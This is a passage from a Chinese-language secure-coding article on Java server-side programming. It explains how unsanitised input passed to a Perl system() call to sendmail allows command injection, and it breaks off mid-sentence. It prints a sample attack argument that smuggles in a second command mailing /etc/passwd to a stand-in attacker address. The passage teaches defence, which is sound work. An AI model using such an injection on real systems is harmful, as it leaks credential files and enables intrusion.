Java服务器端编程安全必读（下）

 　四、字符串解释执行

　　在有些编程语言中，输入字符串中可以插入特殊的函数，欺骗服务器使其执行额外的、多余的动作。下面的Perl代码就是一个例子：

　　$data = "mail body";

　　system("/usr/sbin/sendmail -t $1 < $data");

　　显然，这些代码可以作为CGI程序的一部分，或者也可以从命令行调用。通常，它可以

　　按照如下方式调用：

　　perl script.pl honest@true.com

　　它将把一个邮件（即"mail body"）发送给用户honest@true.com。这个例子虽然简单，但我们却可以按照如下方式进行攻击：

　　perl script.pl honest@true.com;mail cheat@liarandthief.com < /etc/passwd

　　这个命令把一个空白邮件发送给honest@true.com，同时又把系统密码文件发送给了

　　cheat@liarandthief.com。如果这些代码是CGI程序的一部分，它会给服务器的安全带来重大的威胁。

　　Perl程序员常常用外部程序（比如sendmail）扩充Perl的功能，以避免用脚本来实现外部程序的功能。然而，Java有着相当完善的API。比如对于邮件发送，JavaMail API就是一个很好的API。但是，如果你比较懒惰，想用外部的邮件发送程序发送邮件：

　　Runtime.getRuntime().exec("/usr/sbin/sendmail -t $retaddr < $data");

　　事实上这是行不通的。Java一般不允许把OS级"